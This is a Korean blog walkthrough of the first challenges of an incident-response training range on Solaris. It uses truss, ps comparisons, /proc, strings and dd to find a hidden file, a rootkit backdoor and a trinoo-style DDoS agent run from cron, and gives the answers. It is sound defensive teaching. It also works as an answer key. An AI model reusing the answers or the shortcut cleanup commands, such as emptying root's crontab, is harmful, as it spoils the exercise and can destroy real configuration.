#44u61l5f :: sis.or.kr - 침해사고대응 풀이를 해보자.

sis.or.kr 의 침해사고대응 훈련장에 대한 풀이인데요,
40개 다 써놓으면 문제가 되겠죠..
그래서 1페이지의 20문제만 풀이를 써놓습니다.
기존의 해킹문제들은 침투를 해서 어떻게 더 높은 권한을
획득하느냐, 얻고자 하는걸 얻느냐 였다면,
이건 침임했던 해커의 흔적이 무엇인가?
어떻게 하면 해커의 재 침입을 막을 수 있는가?
등에 대해서 알 수 있는 문제들이라고 할 수 있습니다.
좀 엉터리 같이 푼게 마음에 걸리네요.. :)
잘못된 내용은 dual5651@hotmail.com 으로 ~

=====================================================
Question 1 - truss를 이용한 시스템 명령 변조 여부 확인
=====================================================

먼저 su를 이용해 root로 들어갑니다.

login: dual5651
Password:
Last login: Sat Apr 21 12:52:02 from 59.5.43.67
Sun Microsystems Inc. SunOS 5.8 Generic Patch October 2001
$ su root
Password:
# challenge 1
Now, You are challenging question 1.
Good Luck!

이 문제를 풀이하는데 쓰이는 truss 옵션은 -t 인데,
이 옵션은 특정한 시스템 서비스 호출에 대해서만 trace를 하도록 합니다.
truss -t open ls 를 하게 되면, ls 라는 프로그램에 대하여 open()하는것만
Trace한 결과를 보여주게 됩니다.
솔라리스 환경에서는 truss가 있고, linux에서는 strace 명령어, ltrace명령어등이 존재
합니다.

# truss -t open ls
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librt.so.1", O_RDONLY) = 3
open("/usr/lib/libgen.so.1", O_RDONLY)    = 3
open("/usr/lib/libnsl.so.1", O_RDONLY)    = 3
open("/usr/lib/libc.so.1", O_RDONLY)    = 3
open("/usr/lib/libaio.so.1", O_RDONLY)    = 3
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
open("/usr/lib/libmp.so.2", O_RDONLY) = 3
open("/usr/platform/SUNW,Sun-Fire-880/lib/libc_psr.so.1", O_RDONLY) = 3
open64("/dev/ptyr", O_RDONLY) = 3
open64(".", O_RDONLY|O_NDELAY)    = 3
open64("./../", O_RDONLY|O_NDELAY)    = 4
open64("./../../", O_RDONLY|O_NDELAY) = 4
open("/etc/mnttab", O_RDONLY) = 5
local.cshrc local.login local.profile s r

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 숨기려고 한 파일 이름은 무엇입니까?
Answer > s r
Congratz! You made a success of challenge!

=====================================================
Question 2 - 공개도구를 이용한 분석
=====================================================

# challenge 2
Now, You are challenging question 2.
Good Luck!

이 문제는 정상적인 방법으로 풀고자 한다면,
/var 에 접근하는 프로세스를 fuser 로 찾아내면 될것이다.
하지만 현재 시스템에는 fuser가 존재하지 않는것으로 보임으로,
문제를 시작하기 전의 프로세스와 문제를 시작하고 나서의 프로세스를
비교해서 대상 프로세스를 찾아보면,

before :

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:12 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 14507 14498 0 14:58:16 pts/2    0:00 ps -ef
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

after:

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:12 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 14715 14498 0 15:00:42 pts/2    0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 14682 1 0 15:00:40 ?    0:00 /usr/bin/vfsadmd
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

/usr/bin/vfsadmd 라는 프로세스가 새롭게 등장한 것을 볼 수 있다.

해당 프로세스를 죽이고, strings로 열어보았다.

# kill -9 14682
# strings /usr/bin/vfsadmd
vfsadmd
/var/du y.log
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
SUNWrc RCMGR
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport

/var에 있는 dummy.log라는 파일을 대상 파일로 짐작하여 볼 수 있다.

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 오픈한 파일의 전체 경로는?
Answer > /var/du y.log
Congratz! You made a success of challenge!

=====================================================
Question 3 - Forensic Duplication
=====================================================

# challenge 3
Now, You are challenging question 3.
Good Luck!

df 명령어를 이용해 파티션 목록을 보자.

# df
/    (/dev/dsk/c1t1d0s0 ): 7779844 blocks 495156 files
/usr (/dev/dsk/c1t1d0s4 ): 3729410 blocks 934939 files
/boot    (/dev/dsk/c1t5d0s2 ): 61414 blocks    18991 files
/proc    (/proc ): 0 blocks    29928 files
/dev/fd    (fd    ): 0 blocks    0 files
/etc/mnttab    (mnttab    ): 0 blocks    0 files
/var (/dev/dsk/c1t1d0s5 ):91428048 blocks 5972252 files
/var/run (swap    ):23230880 blocks 440748 files
/tmp (swap    ):23230880 blocks 440748 files
/data    (/dev/dsk/c1t1d0s6 ):    4408 blocks    18876 files
/home1 (/dev/dsk/c1t2d0s7 ):138035188 blocks 8473946 files
/backup    (/dev/dsk/c1t1d0s7 ): 219640 blocks    57019 files
/home3 (/dev/dsk/c1t4d0s7 ):141184988 blocks 8476538 files
/home4 (/dev/dsk/c1t5d0s0 ): 582428 blocks 152061 files
/home    (/dev/dsk/c1t5d0s3 ): 2641676 blocks 324324 files
/mnt (/dev/dsk/c1t5d0s7 ):133757598 blocks 8056345 files

복사 대상 파티션은 /data 였다.
dd 명령어에 다음과 같은 옵션을 주어서 대상 파일을 백업할 수 있다.

dd if=copy해올파티션 of=copy한파일

# dd if=/dev/dsk/c1t1d0s6 of=/home1/user001/victim.data.dd
30528+0 records in
30528+0 records out

# cd /home1/user001
# ls -al
total 15280
drwxr-xr-x    2 user001 training    512 Apr 21 15:11 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 21 14:46 .profile
-rw-r--r--    1 user001 training    124 Apr 21 14:46 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 21 14:46 local.login
-rw-r--r--    1 user001 training    582 Apr 21 14:46 local.profile
-rw-r--r--    1 root other 3 Apr 21 15:05 test.c
-rw-r--r--    1 root other    15630336 Apr 21 15:11 victim.data.dd

파일이 생겼음을 볼 수 있다.
md5sum

=====================================================
Question 4 - 루트킷
=====================================================

이번에도 간단히 프로세스 비교 방법으로 풀어보면,

before :

# ps -ef
UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:14 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 16720 14498 0 15:30:48 pts/2    0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

after:

UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cer
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:14 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -m
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 16782 14498 0 15:31:28 pts/2    0:00 ps -ef
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -sysl
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 16933 1 0 15:31:26 ?    0:00 /usr/bin/inetd-s
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.4
.67
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

# ls /usr/bin/inetd-s
#

rootkit이여서, ls로는 볼 수 없는것으로 보인다.

# cd /proc/16933/object
# ls -al
total 2540
dr-x------    2 root other 544 Apr 21 15:33 .
dr-x--x--x    5 root other 736 Apr 21 15:33 ..
-r-xr--r--    0 root other    126068 Apr 21 15:33 a.out
-r-xr-xr-x    1 root bin    4848 May 6 2006 ufs.118.28.306902
-r-xr-xr-x    1 root bin    5292 May 6 2006 ufs.118.28.343137
-r-xr-xr-x    1 root bin 24968 May 6 2006 ufs.118.28.343169
-r-xr-xr-x    1 root bin    238608 May 6 2006 ufs.118.28.343181
-r-xr-xr-x    1 root bin 70864 May 6 2006 ufs.118.28.343185
-r-xr-xr-x    1 root bin 1158072 May 6 2006 ufs.118.28.343531
-r-xr-xr-x    1 root bin    911328 May 6 2006 ufs.118.28.343533

# strings a.out
inetd-s
program_name : h 3r
could not unlink file %s, program exiting abnormally
warez v1.0 unlinked and daemonized, listening on port %d
err: cant dup (%s)
no memory for %s
/bin/sh
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Command (type 'quit' to quit) :
connection closed by client
..........

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격 프로그램의 이름은?
Answer > h 3r
Congratz! You made a success of challenge!

=====================================================
Question 5 - UDP Flooding
=====================================================

# challenge 5
Now, You are challenging question 5.
Good Luck!

먼저 프로세스 비교를 통해 대상 프로세스를 찾아 냅니다.

before :

UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 21268 13621 0 16:30:01 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:17 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 21344 21268 0 16:30:28 pts/2    0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

after :

UID PID PPID C    STIME TTY    TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ?    0:00 ipmon -Ds
root 21268 13621 0 16:30:01 pts/2    0:00 sh
root    65 1 0 20:17:04 ?    0:00 /usr/lib/sysevent/syseventd
root    79 1 0 20:17:06 ?    1:17 /usr/lib/picl/picld
root    74 1 0 20:17:05 ?    0:00 devfsadmd
root 185 1 0 20:17:12 ?    0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ?    0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ?    0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ?    0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ?    0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ?    0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ?    0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ?    0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ?    0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ?    0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ?    0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ?    0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ?    0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ?    0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ?    0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ?    0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ?    0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ?    0:00 in.telnetd
root 596 1 0 20:17:42 ?    0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ?    0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ?    0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ?    0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ?    0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ?    0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ?    0:00 /usr/lib/saf/ttymon
root 21416 1 0 16:31:07 ?    0:00 /usr/sbin/rpc.listen
root 699 1 0 20:17:44 ?    0:00 /usr/lib/saf/sac -t 300
root 21426 1 0 16:31:07 ?    0:00 /usr/sbin/master
root 13560 13477 0 14:46:22 pts/2    0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 21428 21268 0 16:31:08 pts/2    0:00 ps -ef
root 3374 636 0 20:26:51 ?    0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ?    0:00 /usr/openwin/bin/fbconsole -d :0

두가지 프로세스가 새로 생성되는 것을 볼 수 있고,
부모의 PID가 1인것을 보아 crontab을 뒤져볼 필요가 있을거 같습니다.

# cd crontabs
# ls -al
total 200
drwxr-xr-x    2 root sys    2048 Mar 29 2006 .
drwxr-xr-x    4 root sys 512 Sep 26 2003 ..
-rw-r--r--    1 root sys 190 Sep 26 2003 adm
-rw-------    1 root other    181176 Dec 20 2004 core
-r--r--r--    1 root root    750 Sep 26 2003 lp
-rw-r--r--    1 root sys 516 Apr 21 16:31 root
-rw-r--r--    1 root sys 308 Sep 26 2003 sys
-r--------    1 root training    0 Jul 10 2005 user016
-r--r--r--    1 root sys 404 Sep 26 2003 uucp
# cat root | grep rpc.listen
10 3 * * 0,4 /usr/sbin/rpc.listen

역시 목록에 들어 있음을 볼 수 있습니다.

strings로 대상들로 부터 정보를 수집합니다.

rpc.listen :

strings /usr/sbin/rpc.listen
rpc.listen
127. . .1
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
Bind
%s %s %s
aIf3YWfOhw.V.
PONG
Recvfrom
Socket
*HELLO*
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport

IP로 생각되는 문자열을 발견할 수 있습니다.

master :

strings /usr/sbin/master
master
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Process is currenlty running..
---v
tr oo %s
l44adsl
gOrave
17:43:33
v1.07d2+f3+c
Dec 24 2003
tr oo %s [%s:%s]
Bind
bcast
Listing Bcasts.
quit
bye bye.
%s %s

대상 프로그램의 이름으로 짐작되는 문자열을 발견할 수 있습니다.

이제 정보를 수집하였으니, 대상 프로세스들을 종료하고 파일들을 삭제합니다.

# kill -9 21426
# kill -9 21416
# rm -rf /usr/sbin/master
# rm -rf /usr/sbin/rpc.listen
# pwd
/var/spool/cron/crontabs
# cat /dev/null > root

임시적인 문제풀이이기 떄문에, 마지막에 /dev/null을 root에 넣은 것이지 실제에서는
rpc.listen 부분만 지워주어야 합니다.

finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 설치된 DDoS 도구의 이름은 무엇인가?
Answer > tr oo
Question > Master 서버의 IP는 무엇인가?
Answer > 127. . .1
Congratz! You made a success of challenge!

=====================================================
Question 6 - 물리적 보안 영역
=====================================================

먼저 ps -ef를 이용해 프로세스 목록을 구해 둡니다.

ps -ef

UID    PID PPID C STIME TTY    TIME CMD
root 1 0 0 Dec02 ?    00:00:05 init
root 2 1 0 Dec02 ?    00:00:00 [keventd]
root 3 1 0 Dec02 ?    00:00:00 [kapmd]
root 4 1 0 Dec02 ?    00:00:00 [ksoftirqd_CPU0]
root 5 1 0 Dec02 ?    00:00:00 [kswapd]
root 6 1 0 Dec02 ?    00:00:00 [bdflush]
root 7 1 0 Dec02 ?    00:00:00 [kupdated]
root 8 1 0 Dec02 ?    00:00:00 [mdrecoveryd]
root    12 1 0 Dec02 ?    00:00:00 [kjournald]
root 128 1 0 Dec02 ?    00:00:00 [kjournald]
root 443 1 0 Dec02 ?    00:00:00 syslogd -m 0
root 448 1 0 Dec02 ?    00:00:00 klogd -x
root 551 1 0 Dec02 ?    00:00:00 xinetd -stayalive -reuse -pidfil
e /var/run/xinetd.pid
root 575 1 0 Dec02 ?    00:00:00 sendmail: accepting connections
bin    606 1 0 Dec02 ?    00:00:00 cannaserver -syslog -u bin -inet
root 620 1 0 Dec02 ?    00:00:00 crond
root 641 1 0 Dec02 tty1 00:00:00 /sbin/mingetty tty1
root 642 1 0 Dec02 tty2 00:00:00 /sbin/mingetty tty2
root 643 1 0 Dec02 tty3 00:00:00 /sbin/mingetty tty3
root 644 1 0 Dec02 tty4 00:00:00 /sbin/mingetty tty4
root 645 1 0 Dec02 tty5 00:00:00 /sbin/mingetty tty5
root 646 1 0 Dec02 tty6 00:00:00 /sbin/mingetty tty6
root 649 551 0 Dec02 ?    00:00:00 in.telnetd
root 650 649 0 Dec02 ?    00:00:00 login -- root
root 651 650 0 Dec02 pts/0    00:00:00 -bash
root 748 651 0 01:17 pts/0    00:00:00 ps -ef

kstat -P 옵션을 이용해 모든 프로세스 목록을 구해 옵니다.

kstat -P
